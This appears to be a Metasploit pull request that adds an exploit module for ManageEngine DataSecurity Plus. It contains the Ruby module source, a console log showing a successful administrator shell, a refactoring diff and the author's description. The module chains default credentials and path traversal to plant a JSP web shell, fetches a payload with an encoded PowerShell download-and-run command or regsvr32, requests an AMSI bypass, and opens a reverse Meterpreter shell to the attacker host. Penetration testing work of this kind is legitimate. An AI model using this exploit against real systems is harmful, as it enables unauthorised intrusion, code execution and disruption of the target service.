+   WEB_DELIVERY_VIA_PSH  false            yes       If enabled (default), the module will use only Powershell (in memory) to deliver the payload. If disabled, the Regsvr32 web delivery method is used
+   XNODE_PORT            29119            yes       The Xnode port
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.128    yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   DataSecurity Plus
+
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > run
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > 
+[+] Successfully authenticated to the Xnode server
+[*] Obtained Xnode installation path: 'C:\Program Files (x86)\ManageEngine\DataSecurity Plus\apps\dataengine-xnode'.
+[+] The target appears to be vulnerable. Target is running Xnode version: XNODE_1_0_0
+[*] Using URL: http://192.168.1.128:8080/JKxqtuT6N0SR
+[*] Server started.
+[*] Obtained expected Xnode "de_healh" status: "GREEN".
+
+[!] This exploit will wipe the contents in the <datasecurity_install_dir>\apps\dataengine-xnode\conf\datarepository\schema directory.
+[!] If that directory remains empty, Xnode will stop working and it will not be possible to reboot DataSecurity Plus.
+[!] This module will try to repopulate the directory with the default JSON files, but that may impact functionality for a non-default configuration.
+[*] Requesting JSP payload: http://192.168.1.225:8800/bqpmsuo.jsp
+[+] Successfully requested JSP payload
+[*] 192.168.1.225   manageengine_datasecurity_plus_traversal_rce - Delivering Payload (3696 bytes)
+[*] Sending stage (200774 bytes) to 192.168.1.225
+[+] We got a session! Please be patient while cleanpup is performed. This may take a while.
+[*] Server stopped.
+[+] Successfully removed the JSP payload from C:\Program Files (x86)\ManageEngine\DataSecurity Plus\webapps\fap\bqpmsuo.jsp.
+[*] Attempting to repopulate apps\dataengine-xnode\conf\datarepository\schema with the default JSON files.
+[+] Successfully uploaded the default Xnode datarepostiory schema files.
+[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.225:1215) at 2022-06-10 12:43:06 -0400
+
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > sessions 4
+[*] Starting interaction with 4...
+
+meterpreter > shell
+Process 3768 created.
+Channel 29 created.
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files (x86)\ManageEngine\DataSecurity Plus\bin>whoami
+whoami
+lies\administrator
+```

--- a/modules/exploits/windows/http/manageengine_datasecurity_plus_traversal_rce.rb
+++ b/modules/exploits/windows/http/manageengine_datasecurity_plus_traversal_rce.rb
@@ -1,0 +1,435 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Auxiliary::ManageengineXnode
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine DataSecurity Plus Xnode Directory Traversal RCE',
+        'Description' => %q{
+          This module exploits default credentials (CVE-2020-11532) and a path
+          traversal vulnerability (CVE-2020-11531) in the DataEngine Xnode server
+          in ManageEngine DataSecurity Plus versions prior to 6.0.1 (6011). These
+          issues are chained in order to achieve remote code execution with local
+          administrator privileges.
+
+          The module first tries to authenticate to the Xnode server using default
+          credentials. If this works, it then requests the Xnode version. If the
+          target seems vulnerable, the module sends a dr:/dr_schema_sync action
+          request to the Xnode server, which exploits directory traversal to write
+          a malicious JSP file to the web root at <install_dir>\webapps\fap\. It
+          will then try to execute the JSP file via a simple HTTP GET request.
+
+          This module has been successfully tested against ManageEngine
+          DataSecurity Plus version 6.0.1 (6010) running on Windows Server 2012.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Sahil Dhar', # discovery and PoC (for authentication only)
+          'Erik Wynter', # @wyntererik - additional research and Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-11531'],
+          ['CVE', '2020-11532'],
+          ['PACKETSTORM', '157604']
+        ],
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Targets' => [
+          [
+            'DataSecurity Plus', {
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'DefaultOptions' => {
+                'RPORT' => 8800,
+                'XNODE_PORT' => 29119
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+          'Powershell::exec_in_place' => true
+        },
+        'DefaultTarget' => 0,
+        'Privileged' => true,
+        'DisclosureDate' => '2020-05-08',
+        'Notes' => {
+          # the data repository schema files in <datasecurity_install_dir>\apps\dataengine-xnode\conf\datarepository\schema will be wiped
+          # by default, the module will upload default schema files to restore the service, but this may lead to resource loss for non-default configs
+          'Stability' => [ SERVICE_RESOURCE_LOSS ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION ] # this is true only if RESTORE_SCHEMA_DIR is set to true (default configuration)
+        }
+      )
+    )
+
+    register_options [
+      OptBool.new('CUSTOM_PAYLOAD', [false, 'Enable use of payloads other than windows/x64/meterpreter/reverse_*', false]),
+      OptBool.new('RESTORE_SCHEMA_DIR', [false, 'Upon successful exploitation, repopulate <datasecurity_install_dir>\apps\dataengine-xnode\conf\datarepository\schema with the default JSON files', true]),
+      OptInt.new('XNODE_PORT', [ true, 'The Xnode port', nil]),
+      OptBool.new('WEB_DELIVERY_VIA_PSH', [ true, 'If enabled (default), the module will use only Powershell (in memory) to deliver the payload. If disabled, the Regsvr32 web delivery method is used', true]),
+    ]
+
+    register_advanced_options(
+      [
+        OptBool.new('PSH-AmsiBypass', [ true, 'PSH - Request AMSI/SBL bypass before the stager', true ]),
+        OptString.new('PSH-AmsiBypassURI', [ false, 'PSH - The URL to use for the AMSI/SBL bypass (Will be random if left blank)', '' ]),
+        OptBool.new('PSH-EncodedCommand', [ true, 'PSH - Use -EncodedCommand for web_delivery launcher', true ]),
+        OptBool.new('PSH-ForceTLS12', [ true, 'PSH - Force use of TLS v1.2', true ]),
+        OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
+        OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
+        OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
+      ]
+    )
+  end
+
+  def custom_payload
+    datastore['CUSTOM_PAYLOAD']
+  end
+
+  def restore_schema_dir
+    datastore['RESTORE_SCHEMA_DIR']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def xnodeport
+    datastore['XNODE_PORT']
+  end
+
+  def web_delivery_via_psh
+    datastore['WEB_DELIVERY_VIA_PSH']
+  end
+
+  def web_root_dir
+    'C:\Program Files (x86)\ManageEngine\DataSecurity Plus\webapps\fap\\'
+  end
+
+  def amsi_bypass_uri
+    unless datastore['PSH-AmsiBypassURI'].empty?
+      @amsi_uri = datastore['PSH-AmsiBypassURI']
+    end
+    @amsi_uri ||= random_uri
+  end
+
+  def gen_psh(url, *method)
+    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+    force_tls12 = Rex::Powershell::PshMethods.force_tls12 if datastore['PSH-ForceTLS12']
+
+    if method.include? 'string'
+      download_string = datastore['PSH-Proxy'] ? Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) : Rex::Powershell::PshMethods.download_and_exec_string(url)
+    else
+      # Random filename to use, if there isn't anything set
+      random = "#{rand_text_alphanumeric(8)}.exe"
+
+      # Set filename (Use random filename if empty)
+      filename = datastore['PSHBinary-FILENAME'].blank? ? random : datastore['PSHBinary-FILENAME']
+
+      # Set path (Use %TEMP% if empty)
+      path = datastore['PSHBinary-PATH'].blank? ? '$env:temp' : %('#{datastore['PSHBinary-PATH']}')
+
+      # Join Path and Filename
+      file = %(echo (#{path}+'\\#{filename}'))
+
+      # Generate download PowerShell command
+      download_string = Rex::Powershell::PshMethods.download_run(url, file)
+    end
+
+    download_and_run = "#{force_tls12}#{ignore_cert}#{download_string}"
+
+    # Generate main PowerShell command
+    if datastore['PSH-EncodedCommand']
+      download_and_run = encode_script(download_and_run)
+      return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: download_and_run)
+    end
+
+    return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
+  end
+
+  def rand_class_id
+    "#{Rex::Text.rand_text_hex(8)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(12)}"
+  end
+
+  def gen_sct_file(command)
+    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric(8)}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
+  end
+
+  def on_request_uri(cli, request)
+    if request.raw_uri.to_s.ends_with?('.sct')
+      vprint_status('Handling .sct Request')
+      psh = gen_psh(get_uri.to_s, 'string')
+
+      if web_delivery_via_psh
+        vprint_error('Unexpected request for .sct file')
+        # nuke the server
+        service.stop
+      else
+        data = gen_sct_file(psh)
+        send_response(cli, data, 'Content-Type' => 'text/plain')
+      end
+      return
+    end
+
+    if request.raw_uri.to_s.ends_with?(amsi_bypass_uri)
+      data = bypass_powershell_protections
+      vprint_status("Delivering AMSI Bypass (#{data.length} bytes)")
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+      return
+    end
+
+    data = cmd_psh_payload(
+      payload.encoded,
+      payload_instance.arch.first
+    )
+
+    print_status("Delivering Payload (#{data.length} bytes)")
+    send_response(cli, data, 'Content-Type' => 'application/octet-stream')
+  end
+
+  def conf_restore_fail_warning
+    print_warning('The remote Data Security directory apps\dataengine-xnode\conf\datarepository\schema is now empty, which will break functionality of the Xnode server.')
+    print_warning('Consider uploading the default datarepository schema files manually.')
+  end
+
+  def on_new_session(cli)
+    # nuke the server
+    service.stop
+
+    unless cli.type.to_s.eql? 'meterpreter'
+      print_warning("Manual cleanup of the JSP payload is required. The file may be located at #{web_root_dir}#{@jsp_name}")
+      if restore_schema_dir
+        print_warning('Detected non-meterpreter shell. Cannot perform repopulation of the apps\dataengine-xnode\conf\datarepository\schema directory with the default JSON files.')
+      end
+      conf_restore_fail_warning
+      return
+    end
+
+    print_good('We got a session! Please be patient while cleanpup is performed. This may take a while.')
+    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
+    pwd = cli.fs.dir.pwd
+    try_to_restore = true
+
+    # on a default install, the Xnode installation path is:
+    # "C:\Program Files (x86)\ManageEngine\DataSecurity Plus\apps\dataengine-xnode" or possibly C:\Program Files\ManageEngine\DataSecurity Plus\apps\dataengine-xnode
+    # the default directory where we pop a shell is:
+    # "C:\Program Files (x86)\ManageEngine\DataSecurity Plus\bin or possibly C:\Program Files\ManageEngine\DataSecurity Plus\bin
+    # if we have the xnode install path and it doesn't match the default, or the pwd doesn't match the default, it may be safer not to upload the default schema files
+    if @xnode_install_path && @xnode_install_path.ends_with?('ManageEngine\DataSecurity Plus\apps\dataengine-xnode')
+      file_to_delete = "#{@xnode_install_path.gsub('apps\dataengine-xnode', 'webapps\fap')}\\#{@jsp_name}"
+    elsif pwd && pwd.end_with?('ManageEngine\DataSecurity Plus\bin')
+      file_to_delete = "#{pwd.gsub('bin', 'webapps\fap')}\\#{@jsp_name}"
+    else
+      if restore_schema_dir
+        vprint_warning('Detected a non-default installation directory. The module will not attempt to upload of the datarepostiory schema files.')
+        try_to_restore = false
+      end
+      # guess the absolute path to the JSP payload by using the default. this is unlikely to work, but we can still try
+      file_to_delete = "#{web_root_dir}#{@jsp_name}"
+    end
+
+    if cli.fs.file.exist?(file_to_delete)
+      begin
+        cli.fs.file.rm(file_to_delete)
+        if cli.fs.file.exist?(file_to_delete)
+          print_error("Failed to delete the JSP payload from #{file_to_delete}")
+          print_warning('Manual cleanup is required.')
+        else
+          print_good("Successfully removed the JSP payload from #{file_to_delete}.")
+        end
+      rescue StandardError => e
+        print_error("Encountered the following error when trying to delete the JSP payload from #{file_to_delete}.")
+        print_error(e)
+        print_warning('Manual cleanup is required.')
+      end
+    else
+      print_error('Unable to delete the JSP payload because it is not in the expected location.')
+      print_warning('Manual cleanup is required.')
+    end
+
+    # check if we should proceed with restoring the default JSON files to the schema directory
+    unless restore_schema_dir && try_to_restore
+      conf_restore_fail_warning
+      return
+    end
+
+    unless Dir.exist?(@xnode_schema_local_path)
+      print_error("The local directory #{@xnode_schema_local_path} does not exist. Cannot upload the datarepostiory schema files.")
+      conf_restore_fail_warning
+      return
+    end
+
+    print_status('Attempting to repopulate apps\dataengine-xnode\conf\datarepository\schema with the default JSON files.')
+
+    begin
+      missing_file_ct = 0
+      # upload the default datarepostiory schema files to the target, since the exploit has wiped them, which will break the app
+      Dir.foreach(@xnode_schema_local_path) do |f|
+        next if (f == '.') || (f == '..')
+
+        local_path = "#{@xnode_schema_local_path}/#{f}"
+        remote_path = "#{@xnode_schema_remote_path}/#{f}"
+        vprint_status("Uploading #{f} to #{remote_path}...")
+        cli.fs.file.upload_file(remote_path, local_path)
+      end
+    rescue StandardError => e
+      missing_file_ct += 1
+      print_error("Unable to upload the configuration file #{f} to #{remote_path}.")
+      vprint_error("Encountered the following error: #{e}")
+    end
+
+    if missing_file_ct == 0
+      print_good('Successfully uploaded the default Xnode datarepostiory schema files.')
+    else
+      print_warning('Failed to upload all default Xnode datarepostiory schema files. Consider uploading these manually.')
+    end
+  end
+
+  def check
+    @sock = Rex::Socket::Tcp.create(
+      'PeerHost' => rhost,
+      'PeerPort' => xnodeport
+    )
+
+    res = send_to_sock(@sock, action_authenticate(username, password))
+
+    print_line # prevent awkward printing of the vulnerability status or another statement next to the module name instead of on a new line
+    unless res.instance_of?(Hash) && res.keys.include?('response') && res['response'].instance_of?(Hash)
+      return Exploit::CheckCode::Unknown('Received unexpected response. The target may not be an Xnode server.')
+    end
+
+    if res['response']['status'] == 'authentication_success'
+      print_good('Successfully authenticated to the Xnode server')
+      # get the Xnode info, so we can check the Xnode version. This should be XNODE_1_0_0
+      res_info = send_to_sock(@sock, action_xnode_info)
+      unless res_info.instance_of?(Hash) && res_info.keys.include?('response') && res_info['response'].instance_of?(Hash)
+        print_warning('Received unexpected response while trying to obtain the Xnode version and installation path via the "xnode_info" action. Enumeration may not work.')
+        return Exploit::CheckCode::Unknown('Received unexpected response. The target may not be an Xnode server.')
+      end
+
+      if res_info['response'].keys.include?('xnode_installation_path')
+        @xnode_install_path = res_info['response']['xnode_installation_path']
+        print_status("Obtained Xnode installation path: '#{@xnode_install_path}'.")
+      else
+        print_warning('Failed to obtain the Xnode installation path.')
+      end
+
+      if res_info['response'].keys.include?('xnode_version')
+        xnode_version = res_info['response']['xnode_version']
+        if xnode_version == 'XNODE_1_0_0'
+          return Exploit::CheckCode::Appears("Target is running Xnode version: #{xnode_version}")
+        else
+          return Exploit::CheckCode::Safe("Target is running Xnode version: #{xnode_version}")
+        end
+      end
+
+      return Exploit::CheckCode::Detected('Failed to obtain the Xnode version.')
+    end
+
+    if res['response'].include?('error_msg')
+      case res['response']['error_msg']
+      when 'Authentication failed!'
+        return Exploit::CheckCode::Safe('Failed to authenticate to the Xnode server.')
+      when 'Remote request-processing disabled!!'
+        return Exploit::CheckCode::Safe('Remote request-processing is disabled on the Xnode server.')
+      end
+    end
+
+    return Exploit::CheckCode::Unknown('Received unexpected response. The target may not be an Xnode server.')
+  end
+
+  def action_dr_sync(trav_path, pl)
+    hm_key = rand_text_alpha_lower(6..12)
+    {
+      'action' => 'dr:/dr_schema_sync',
+      'request_id' => 1,
+      'dr_schema_list' => {
+        trav_path => {
+          hm_key => "<% Runtime.getRuntime().exec(new String(new byte[] {#{pl}})); %>"
+        }
+      }
+    }
+  end
+
+  def pop_thy_shell(_jsp_name)
+    jsp_uri = normalize_uri(target_uri.path, @jsp_name)
+
+    print_status("Requesting JSP payload: #{full_uri(jsp_uri)}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => jsp_uri
+    )
+
+    unless res && res.code == 200
+      # nuke the server
+      service.stop
+      fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')
+    end
+
+    print_good('Successfully requested JSP payload')
+  end
+
+  def primer
+    # currently, only windows/x64/meterpreter/reverse_* payloads seem to be working. It may be useful to inform users about this.
+    if !datastore['PAYLOAD'].start_with?('windows/x64/meterpreter/reverse_') && !custom_payload
+      fail_with(Failure::BadConfig, 'Payloads other than windows/x64/meterpreter/reverse_* may not work. To enable additional payloads, set CUSTOM_PAYLOAD to true.')
+    end
+
+    if web_delivery_via_psh
+      uri = get_uri
+      if datastore['PSH-AmsiBypass']
+        amsi_uri = uri + amsi_bypass_uri
+        wd_cmd = gen_psh([amsi_uri, uri], 'string').to_s
+      else
+        wd_cmd = gen_psh(uri, 'string').to_s
+      end
+    else
+      wd_cmd = %(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
+    end
+
+    @jsp_name = rand_text_alpha_lower(6..12) + '.jsp'
+
+    trav_path = "../../../../../webapps/fap/#{@jsp_name}"
+    @xnode_schema_local_path = ::File.join(Msf::Config.data_directory, 'exploits', 'manageengine_xnode', 'CVE-2020-11531', 'DataSecurityPlus')
+    @xnode_schema_remote_path = 'C:\Program Files (x86)\ManageEngine\DataSecurity Plus\apps\dataengine-xnode\conf\datarepository\schema'
+
+    # get the Xnode health status
+    res_health = send_to_sock(@sock, action_admin_health)
+    unless res_health.instance_of?(Hash) && res_health.keys.include?('response') && res_health['response'].instance_of?(Hash) && res_health['response'].keys.include?('de_health')
+      print_warning('Received unexpected response while trying to obtain the Xnode "de_health" status. Enumeration may not work.')
+    end
+
+    if res_health['response']['de_health'] == 'GREEN'
+      print_status('Obtained expected Xnode "de_healh" status: "GREEN".')
+    else
+      print_warning("Obtained unexpected Xnode \"de_healh\" status: \"#{res_health['response']['de_health']}\"")
+    end
+
+    action_hash = action_dr_sync(trav_path, wd_cmd.bytes.join(', '))
+    send_to_sock(@sock, action_hash)
+    print_line # to pevent awkward printing on line with module name
+    vprint_status("Using the web_delivery command: #{wd_cmd}")
+    print_warning('This exploit will wipe the contents in the <datasecurity_install_dir>\apps\dataengine-xnode\conf\datarepository\schema directory.')
+    print_warning('If that directory remains empty, Xnode will stop working and it will not be possible to reboot DataSecurity Plus.')
+    if restore_schema_dir
+      print_warning('This module will try to repopulate the directory with the default JSON files, but that may impact functionality for a non-default configuration.')
+    end
+    pop_thy_shell(@jsp_name)
+  end
+end

--- a/modules/exploits/windows/http/manageengine_datasecurity_plus_traversal_rce.rb
+++ b/modules/exploits/windows/http/manageengine_datasecurity_plus_traversal_rce.rb
@@ -301,56 +301,47 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    @sock = Rex::Socket::Tcp.create(
-      'PeerHost' => rhost,
-      'PeerPort' => xnodeport
-    )
-
-    res = send_to_sock(@sock, action_authenticate(username, password))
-
-    print_line # prevent awkward printing of the vulnerability status or another statement next to the module name instead of on a new line
-    unless res.instance_of?(Hash) && res.keys.include?('response') && res['response'].instance_of?(Hash)
-      return Exploit::CheckCode::Unknown('Received unexpected response. The target may not be an Xnode server.')
+    # create a socket
+    res_code, sock_or_msg = create_socket_for_xnode(rhost, xnodeport)
+    if res_code == 1
+      return Exploit::CheckCode::Unknown(sock_or_msg)
     end
 
-    if res['response']['status'] == 'authentication_success'
-      print_good('Successfully authenticated to the Xnode server')
-      # get the Xnode info, so we can check the Xnode version. This should be XNODE_1_0_0
-      res_info = send_to_sock(@sock, action_xnode_info)
-      unless res_info.instance_of?(Hash) && res_info.keys.include?('response') && res_info['response'].instance_of?(Hash)
-        print_warning('Received unexpected response while trying to obtain the Xnode version and installation path via the "xnode_info" action. Enumeration may not work.')
-        return Exploit::CheckCode::Unknown('Received unexpected response. The target may not be an Xnode server.')
-      end
+    @sock = sock_or_msg
 
-      if res_info['response'].keys.include?('xnode_installation_path')
-        @xnode_install_path = res_info['response']['xnode_installation_path']
-        print_status("Obtained Xnode installation path: '#{@xnode_install_path}'.")
+    # perform basic checks to see if Xnode is running and if so, if it is exploitable
+    res_code, res_msg = xnode_check(@sock, username, password)
+    case res_code
+    when 1
+      return Exploit::CheckCode::Safe(res_msg)
+    when 2
+      return Exploit::CheckCode::Unknown(res_msg)
+    end
+
+    # get the Xnode info, so we can check the Xnode version. This should be XNODE_1_0_0
+    res_info = send_to_sock(@sock, action_xnode_info)
+    unless res_info.instance_of?(Hash) && res_info.keys.include?('response') && res_info['response'].instance_of?(Hash)
+      print_warning('Received unexpected response while trying to obtain the Xnode version and installation path via the "xnode_info" action. Enumeration may not work.')
+      return Exploit::CheckCode::Unknown('Received unexpected response.')
+    end
+
+    if res_info['response'].keys.include?('xnode_installation_path')
+      @xnode_install_path = res_info['response']['xnode_installation_path']
+      print_status("Obtained Xnode installation path: '#{@xnode_install_path}'.")
+    else
+      print_warning('Failed to obtain the Xnode installation path.')
+    end
+
+    if res_info['response'].keys.include?('xnode_version')
+      xnode_version = res_info['response']['xnode_version']
+      if xnode_version == 'XNODE_1_0_0'
+        return Exploit::CheckCode::Appears("Target is running Xnode version: #{xnode_version}")
       else
-        print_warning('Failed to obtain the Xnode installation path.')
-      end
-
-      if res_info['response'].keys.include?('xnode_version')
-        xnode_version = res_info['response']['xnode_version']
-        if xnode_version == 'XNODE_1_0_0'
-          return Exploit::CheckCode::Appears("Target is running Xnode version: #{xnode_version}")
-        else
-          return Exploit::CheckCode::Safe("Target is running Xnode version: #{xnode_version}")
-        end
-      end
-
-      return Exploit::CheckCode::Detected('Failed to obtain the Xnode version.')
-    end
-
-    if res['response'].include?('error_msg')
-      case res['response']['error_msg']
-      when 'Authentication failed!'
-        return Exploit::CheckCode::Safe('Failed to authenticate to the Xnode server.')
-      when 'Remote request-processing disabled!!'
-        return Exploit::CheckCode::Safe('Remote request-processing is disabled on the Xnode server.')
+        return Exploit::CheckCode::Safe("Target is running Xnode version: #{xnode_version}")
       end
     end
 
-    return Exploit::CheckCode::Unknown('Received unexpected response. The target may not be an Xnode server.')
+    return Exploit::CheckCode::Detected('Failed to obtain the Xnode version.')
   end
 
   def action_dr_sync(trav_path, pl)


### PR DESCRIPTION
# About
This change adds a new exploit module (docs) that exploits CVE-2020-11531 and CVE-2020-11532 against ManageEngine DataSecurity Plus. The change also adds several JSON files that are required for preventing the exploit from breaking DataSecurity Plus. This PR depends on https://github.com/rapid7/metasploit-framework/pull/16725 because it leverages a mixin at `lib/msf/core/auxiliary/manageengine_xnode` that is added there. The module currently leverages code from the [web_delivery](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/script/web_delivery.rb) module in order to overcome  severe payload limitations (see `Notes` below for more info on this).

# Vulnerable systems
The module exploits default credentials (CVE-2020-11532) and a path traversal vulnerability (CVE-2020-11531)
in the DataEngine Xnode server in ManageEngine DataSecurity Plus versions prior to 6.0.1 (6011).
These issues are chained in order to achieve remote code execution with local administrator privileges.

# Notes
- A full writeup of how Xnode works, how CVE-2020–11531, and why this module leverages code from the `web_delivery` module is available [here](https://medium.com/@erik.wynter/pwning-manageengine-from-poc-to-exploit-cfe5adb8c175)
- A demo video is available [here](https://vimeo.com/724432814).
- The module comes with documentation that explains how it works and how to use it
- As described in the documentation and writeup, this exploit will wipe a bunch of Xnode configuration files that Xnode requires to function. In order to prevent breaking Xnode, which would actualy make it impossible to restart DataSecurity Plus, this changes add the default Xnode configuration files (all JSON files), and uses those to repopulate the Xnode configuration when exploitation is successful. This makes it possible to use the exploit multiple times against the same system without breaking Xnode.
- As mentioned above, the module in its current form includes code that was taken from the `web_delivery` module, because this was the only approach that allowed me to get a shell in msf in a clean manner (see the writeup for more info). If anyone can find a better approach, I'd be happy to incorporate that instead. However, if we do proceed with the `web_delivery` strategy, it would probably make sense to move some of the `web_delivery` code to a mixin so that both the original `web_delivery` module and my module can leverage it. I've written mixins before so I'd be happy to whip that up.
- I ran Rubocop and was able to fix all issues except the one below, because that one resides in the `web_delivery` code that was copied over (and it shows up when I run Rubocop against that module too):
```
modules/exploits/windows/http/manageengine_datasecurity_plus_traversal_rce.rb:128:5: C: Naming/MemoizedInstanceVariableName: Memoized variable @amsi_uri does not match method name amsi_bypass_uri. Use @amsi_bypass_uri instead.
    @amsi_uri ||= random_uri
    ^^^^^^^^^
```
If changes are required to fix this issue, please let me know.
- Information about where to get the software for testing is available in the docs.
- Please let me know if anything is missing or requires elaboration. Feel free to ping me on the Metasploit slack (I'm wynter). :)